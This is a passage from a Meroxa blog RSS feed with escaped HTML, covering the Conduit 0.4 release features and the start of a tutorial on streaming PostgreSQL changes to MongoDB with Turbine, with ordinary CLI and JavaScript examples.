&lt;p&gt;&lt;img src=&quot;https://lh5.googleusercontent.com/Ki3kJ2HeNTtPfVPM2slnX7Hn2XviVBDRbsZdH7PB9Y0vLaZdSUnKnM9KtjyIcpr03-YftuHdke29WfuypRCYYXTxLEzgelFwq8Ci7GvMlszp55NP9dlTTt9Wo90-Ol9RtxCV0XsZ1DgLYBVvknJBFDD3sBQERv_tPzUV9D4jhmgi7O4oGfKB9K-aEMdQfQ&quot; alt=&quot;Code snippet 5&quot;&gt;&lt;/p&gt;
&lt;p&gt;For a more detailed walkthrough of creating a Turbine Ruby application, refer to our &lt;a href=&quot;https://docs.meroxa.com/turbine/ruby/setup&quot;&gt;documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Have questions or feedback?&lt;/h2&gt;
&lt;p&gt;We love hearing from our customers! If you have questions or feedback, please feel free to contact us directly at &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt; or by &lt;a href=&quot;http://discord.meroxa.com&quot;&gt;joining our Discord community server&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;🚀 We can’t wait to see what you build!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Conduit 0.4]]></title><description><![CDATA[Conduit is a tool to help developers build streaming data pipelines between production data stores and messaging systems.]]></description><link>https://meroxa.com/blog/conduit-0.4</link><guid isPermaLink="false">https://meroxa.com/blog/conduit-0.4</guid><dc:creator><![CDATA[Rimas Silkaitis]]></dc:creator><pubDate>Thu, 15 Dec 2022 17:11:04 GMT</pubDate><content:encoded>&lt;p&gt;Conduit 0.4 is out! Conduit’s a tool to help developers build streaming data pipelines between production data stores and messaging systems. For example, if you’ve ever used tools like Kafka Connect, Conduit can be used as a drop-in replacement to help stream data to Apache Kafka. With this release the theme was error handling and debugging. Here’s a look at some of the more interesting features as part of this &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.4.0&quot;&gt;release&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;Stream Inspector&lt;/h2&gt;
&lt;p&gt;Building data pipelines is more difficult than, say, building a web application. In web applications, the developer is in control of the user inputs and the data coming into the system. With data pipelines and data applications, the system has to respond to whatever data is given to it. This means schemas and associated data may change over time and the system has to be able to handle it. In these situations, being able to see what the data looks like throughout the Conduit pipeline is critical to being able to debug what’s happening.&lt;/p&gt;
&lt;p&gt;In this release, developers can now peek at data as it enters Conduit via source connectors and again as it travels to destination connectors. The ability to peek at data as it enters or leaves processors will be coming in a future release. Keep in mind that this feature is about sampling data as it passes through the pipeline, not tailing the pipeline.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;$ wscat &lt;span class=&quot;token parameter variable&quot;&gt;-c&lt;/span&gt; ws://localhost:8080/v1/connectors/pipeline1:destination1/inspect &lt;span class=&quot;token operator&quot;&gt;|&lt;/span&gt; jq &lt;span class=&quot;token builtin class-name&quot;&gt;.&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token string&quot;&gt;&quot;result&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;position&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;NGVmNTFhMzUtMzUwMi00M2VjLWE2YjEtMzdkMDllZjRlY2U1&quot;&lt;/span&gt;,
    &lt;span class=&quot;token string&quot;&gt;&quot;operation&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;OPERATION_CREATE&quot;&lt;/span&gt;,
    &lt;span class=&quot;token string&quot;&gt;&quot;metadata&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string&quot;&gt;&quot;opencdc.readAt&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;1669886131666337227&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;,
    &lt;span class=&quot;token string&quot;&gt;&quot;key&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string&quot;&gt;&quot;rawData&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;NzQwYjUyYzQtOTNhOS00MTkzLTkzMmQtN2Q0OWI3NWY5YzQ3&quot;&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;,
    &lt;span class=&quot;token string&quot;&gt;&quot;payload&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;token string&quot;&gt;&quot;before&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;rawData&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;&quot;&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;,
      &lt;span class=&quot;token string&quot;&gt;&quot;after&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;token string&quot;&gt;&quot;structuredData&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
          &lt;span class=&quot;token string&quot;&gt;&quot;company&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string 1d4398e3-21cf-41e0-9134-3fe012e6d1fb&quot;&lt;/span&gt;,
          &lt;span class=&quot;token string&quot;&gt;&quot;id&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1534737621&lt;/span&gt;,
          &lt;span class=&quot;token string&quot;&gt;&quot;name&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;string fbc664fa-fdf2-4c5a-b656-d52cbddab671&quot;&lt;/span&gt;,
          &lt;span class=&quot;token string&quot;&gt;&quot;trial&quot;&lt;/span&gt;&lt;span class=&quot;token builtin class-name&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token boolean&quot;&gt;true&lt;/span&gt;
        &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
      &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Stream inspection is available via the Conduit API and Dashboard.&lt;/p&gt;
&lt;h2&gt;Dead Letter Queues&lt;/h2&gt;
&lt;p&gt;Continuing the theme of failures throughout a data pipeline: what should happen to data that fails to be processed? Dead Letter Queues are one answer. In Conduit 0.4, if a message causes an error, you now have the option of sending that message to another connector to be saved. What you do with it is up to you. For example, you could create another Conduit pipeline that reprocesses the message once you’ve figured out the root cause.&lt;/p&gt;
&lt;p&gt;To get started with a Dead Letter Queue, you have to specify that you want one as part of your pipeline in the Conduit Pipeline Configuration File:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;1.1&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;dlq-example-pipeline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
	&lt;span class=&quot;token key atrule&quot;&gt;connectors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    	&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;...&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;dead-letter-queue&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    	&lt;span class=&quot;token comment&quot;&gt;# disable stop window&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;window-size&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;
        
        &lt;span class=&quot;token comment&quot;&gt;# the next 3 lines explicitly define the log plugin&lt;/span&gt;
        &lt;span class=&quot;token comment&quot;&gt;# removing this wouldn&apos;t change the behavior, it&apos;s the default DLQ config&lt;/span&gt;
        &lt;span class=&quot;token key atrule&quot;&gt;plugin&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; builtin&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;log
        &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
        	&lt;span class=&quot;token key atrule&quot;&gt;level&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; WARN&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Dead Letter Queues can only be created by using the Pipeline Configuration file. In future releases, we plan to make this functionality available via Conduit’s API.&lt;/p&gt;
&lt;h2&gt;Connector Parameter Validation&lt;/h2&gt;
&lt;p&gt;Conduit connectors can require any number of parameters and data types to successfully connect to a variety of data stores. In this release, connector developers can encode the required parameters in their connectors, and Conduit will surface the correct error messages to end users. This is a big improvement: it provides consistent error messages and makes the connector setup process easier.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Connector%20Parameter%20Validation%20image.png&quot; alt=&quot;Connector Parameter Validation image&quot;&gt;&lt;/p&gt;
&lt;h2&gt;And the rest&lt;/h2&gt;
&lt;p&gt;If you want to see the full list of what was included in this release, check out the &lt;a href=&quot;https://github.com/ConduitIO/conduit/releases/tag/v0.4.0&quot;&gt;Conduit Changelog&lt;/a&gt; and the &lt;a href=&quot;https://docs.conduit.io/docs/introduction/getting-started/&quot;&gt;documentation&lt;/a&gt;. Also, feel free to join us on &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;Discord&lt;/a&gt; or &lt;a href=&quot;https://twitter.com/conduitio&quot;&gt;Twitter&lt;/a&gt;.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Sync, Transform, & Migrate data in Real-Time from PostgreSQL to MongoDB w/ Meroxa]]></title><description><![CDATA[Real-time data sync, transformation & migration from PostgreSQL to MongoDB using Meroxa with Change Data Capture (CDC).]]></description><link>https://meroxa.com/blog/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/sync-transform-migrate-data-in-real-time-from-postgresql-to-mongodb-w/-meroxa</guid><dc:creator><![CDATA[Tanveet Gill]]></dc:creator><pubDate>Tue, 13 Dec 2022 23:23:20 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Video Tutorial (1 minute)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;GitHub Repo:&lt;/strong&gt; &lt;a href=&quot;https://github.com/meroxa/turbine-examples/tree/main/javascript/users-demo&quot;&gt;meroxa/turbine-examples/javascript/users-demo/&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;💡 To see how to move data out of Mongo to any data destination, check out our blog post here: &lt;a href=&quot;https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&quot;&gt;https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;This blog post covers using MongoDB as a downstream destination. We will be moving data in real-time from PostgreSQL to MongoDB. Meroxa will keep track of any changes in your PostgreSQL database and apply those CREATE, UPDATE, or DELETE operations in MongoDB, keeping the two in sync.&lt;/p&gt;
&lt;p&gt;Migrating data from PostgreSQL to MongoDB or vice versa can be a time-consuming process. With Meroxa you can do this in just a few lines of code. In this blog post we will be keeping our PostgreSQL database in sync with our MongoDB Atlas instance. In addition, we will briefly go over how you can transform the data going into MongoDB in real-time.&lt;/p&gt;
&lt;p&gt;While this post covers getting data into Mongo, we can also pull data out of Mongo to &lt;strong&gt;any data destination&lt;/strong&gt; by doing the opposite of what&apos;s covered in this post (&lt;a href=&quot;https://meroxa.com/blog/streaming-changes-in-real-time-from-mongodb-to-apache-kafka&quot;&gt;Here’s a blog post on moving data from MongoDB to Apache Kafka in real-time&lt;/a&gt;).&lt;/p&gt;
&lt;h2&gt;What is Meroxa?&lt;/h2&gt;
&lt;p&gt;Meroxa is a streaming application platform where developers can run their Turbine applications. Meroxa handles the underlying streaming infrastructure so that developers can focus on building their applications. Turbine applications start with an upstream resource. Once that upstream resource is connected, Meroxa will handle streaming the data into the Turbine application for execution.&lt;/p&gt;
&lt;h2&gt;What is Turbine?&lt;/h2&gt;
&lt;p&gt;Turbine is a stream processing application framework for building event-driven data apps that respond to data in real-time and scale using cloud-native best practices. No bespoke domain-specific language (DSL).&lt;/p&gt;
&lt;p&gt;You can even see how your app reacts to data by running your Turbine data applications locally: we show you exactly what will happen in production, enabling faster iteration and development without having to deploy.&lt;/p&gt;
&lt;p&gt;You can write your Turbine data apps using &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/go&quot;&gt;&lt;strong&gt;Go&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/javascript&quot;&gt;&lt;strong&gt;Javascript&lt;/strong&gt;&lt;/a&gt;, &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/python&quot;&gt;&lt;strong&gt;Python&lt;/strong&gt;&lt;/a&gt;, or &lt;a href=&quot;https://docs.meroxa.com/turbine/develop/ruby&quot;&gt;Ruby&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;💡 If you prefer to use another language, Meroxa has support for many more languages on the way. Reach out directly to suggest a language by joining our &lt;a href=&quot;https://discord.com/invite/pN24QPca6b&quot;&gt;community&lt;/a&gt; or by writing to &lt;a href=&quot;mailto:support@meroxa.com&quot;&gt;support@meroxa.com&lt;/a&gt;.&lt;/p&gt;
&lt;h2&gt;How it works&lt;/h2&gt;
&lt;p&gt;In this example, the Turbine app will create a CDC (Change Data Capture) connector from the platform to a PostgreSQL database (it can be any supported database) and then write that data to MongoDB Atlas.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://20285798.fs1.hubspotusercontent-na1.net/hubfs/20285798/Flowcharts%20(1).png&quot; alt=&quot;Flowcharts (1)&quot;&gt;&lt;/p&gt;
&lt;p&gt;Here&apos;s what happens and what we can do to stream and transform our data:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The PostgreSQL connector receives changes in real-time and publishes them in the form of a stream.&lt;/li&gt;
&lt;li&gt;Inside our Turbine app we can write functions to transform and manipulate that data. We can do anything we would generally do in a programming language, such as calling APIs or importing packages and libraries, to change that data.&lt;/li&gt;
&lt;li&gt;The Meroxa Platform then streams that data to MongoDB in real-time, without you, the developer, having to worry about scalability, flexibility, or schemas.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa account&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Meroxa supported PostgreSQL DB&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.mongodb.com/atlas/database&quot;&gt;MongoDB Instance&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://nodejs.org/en/&quot;&gt;Node JS&lt;/a&gt; (In this tutorial we will be using the Turbine Javascript Framework)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Setup&lt;/h2&gt;
&lt;p&gt;Once you have signed up for &lt;a href=&quot;https://auth.meroxa.io/authorize?response_type=code&amp;#x26;client_id=Ty2PyLbdah6pIqRZiq3uxhwA1vhvg6C6&amp;#x26;redirect_uri=https://dashboard.meroxa.io/callback&amp;#x26;mode=signUp&amp;#x26;_ga=2.195716328.574921592.1659337186-1213117309.1659337186&quot;&gt;Meroxa&lt;/a&gt; and set up the &lt;a href=&quot;https://docs.meroxa.com/cli/installation-guide&quot;&gt;Meroxa CLI&lt;/a&gt; you can follow the following 4 steps to get up and running:&lt;/p&gt;
&lt;p&gt;💡 Here we are creating the resources via the CLI, you can also do so via the &lt;a href=&quot;https://dashboard.meroxa.io/resources&quot;&gt;Meroxa Dashboard&lt;/a&gt; once you are logged in.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;
&lt;p&gt;Adding your PostgreSQL and MongoDB Atlas Resources&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;PostgreSQL&lt;/strong&gt; (&lt;a href=&quot;https://docs.meroxa.com/platform/resources/postgresql/setup&quot;&gt;Guide on configuring your PostgreSQL&lt;/a&gt;) - Source Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a PostgreSQL connection to Meroxa named &lt;code class=&quot;language-text&quot;&gt;pg_db&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Note: To support CDC (Change Data Capture) we turn on the &lt;code class=&quot;language-text&quot;&gt;logical_replication&lt;/code&gt; flag.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create pg_db &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;--type postgres \
--url postgres://$PG_USER:$PG_PASS@$PG_URL:$PG_PORT/$PG_DB \
--metadata &apos;{&quot;logical_replication&quot;:&quot;true&quot;}&apos;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;MongoDB Atlas&lt;/strong&gt; (&lt;a href=&quot;https://www.mongodb.com/docs/atlas/getting-started/&quot;&gt;Guide on setting up MongoDB Atlas&lt;/a&gt;) - Destination Resource&lt;/p&gt;
&lt;p&gt;Below we are creating a MongoDB Atlas connection named &lt;code class=&quot;language-text&quot;&gt;mdb&lt;/code&gt;.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa resource create mdb &lt;span class=&quot;token punctuation&quot;&gt;\&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class=&quot;token output&quot;&gt;--type mongodb \
--url &quot;mongodb+srv://$MONGO_USER:$MONGO_PASS@$MONGO_URL/$MONGO_DATABASE_NAME&quot;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Initializing our Turbine app&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;shell-session&quot;&gt;&lt;pre class=&quot;language-shell-session&quot;&gt;&lt;code class=&quot;language-shell-session&quot;&gt;&lt;span class=&quot;token command&quot;&gt;&lt;span class=&quot;token shell-symbol important&quot;&gt;$&lt;/span&gt; &lt;span class=&quot;token bash language-bash&quot;&gt;meroxa apps init postgres-to-mongo &lt;span class=&quot;token parameter variable&quot;&gt;--lang&lt;/span&gt; js  &lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This will create a directory called &lt;code class=&quot;language-text&quot;&gt;postgres-to-mongo&lt;/code&gt; with some boilerplate code to get you started.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Coding our Turbine app&lt;/p&gt;
&lt;p&gt;Open up your &lt;code class=&quot;language-text&quot;&gt;postgres-to-mongo&lt;/code&gt; folder in your preferred IDE. Let’s code our upstream and downstream resources that we defined in step 1 above.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;run&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;turbine&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// First, identify your PostgreSQL source name as configured in Step 1&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;// In our case we named it pg_db&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; source &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;pg_db&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Second, specify the table you want to access in your PostgreSQL DB&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; records &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; source&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;User&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Third, Process each record that comes in!&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; processed &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;process&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;records&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;this&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;processData&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Fourth, identify your MongoDB destination resource configured in Step 1&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;let&lt;/span&gt; destination &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; turbine&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;resources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;mdb&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// Finally, specify which &quot;collection&quot; in mongo to write to. If none exists, it will be created&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;await&lt;/span&gt; destination&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;write&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;processed&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;user_copy&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In our &lt;code class=&quot;language-text&quot;&gt;processData&lt;/code&gt; function we will just log the time when each record was processed. However, in this function you can do anything to transform your records, such as calling an API, manipulating data, enriching data, and so on. The code below shows some examples in the comments.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;js&quot;&gt;&lt;pre class=&quot;language-js&quot;&gt;&lt;code class=&quot;language-js&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;async&lt;/span&gt; &lt;span class=&quot;token function&quot;&gt;processData&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;records&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;for&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; record &lt;span class=&quot;token keyword&quot;&gt;of&lt;/span&gt; records&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;const&lt;/span&gt; dateTimeGmt &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;new&lt;/span&gt; &lt;span class=&quot;token class-name&quot;&gt;Date&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;toUTCString&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
